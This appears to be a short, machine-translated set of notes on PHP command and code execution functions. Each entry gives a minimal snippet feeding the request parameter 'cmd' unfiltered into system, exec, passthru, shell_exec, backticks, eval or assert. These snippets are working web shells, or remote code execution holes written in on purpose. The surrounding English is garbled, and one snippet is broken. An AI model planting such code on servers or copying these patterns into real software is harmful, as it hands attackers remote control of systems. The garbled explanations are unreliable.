Getting Started, used to make some notes, chiefs do not spray. The following functions which may be performed several PHP recording system commands.
system()
<?php
$a = $_GET['cmd'];
system($a);
?>
exec()
<?php
$a = $_GET['cmd'];
echo exec($a);
?>
passthru()
<?php
$a = $_GET['cmd'];
passthru($a);
?>
shell_exec()
<?php
$a = $_GET['cmd'];
echo shell_exec($a);
?>
`` Backtick
<?php
$a = $_GET['cmd'];
Echo `$ a`;
?>
The following are some of the function code is executed.
eval()
<?php
if(isset($_GET['cmd'])){
$a = $_GET['cmd'];
eval("\$a=$a;");
}
?>
assert()
<?php
if(isset($_GET['cmd'])){
$a = $_GET['cmd'];
assert("\$a=$a;");
}
?>
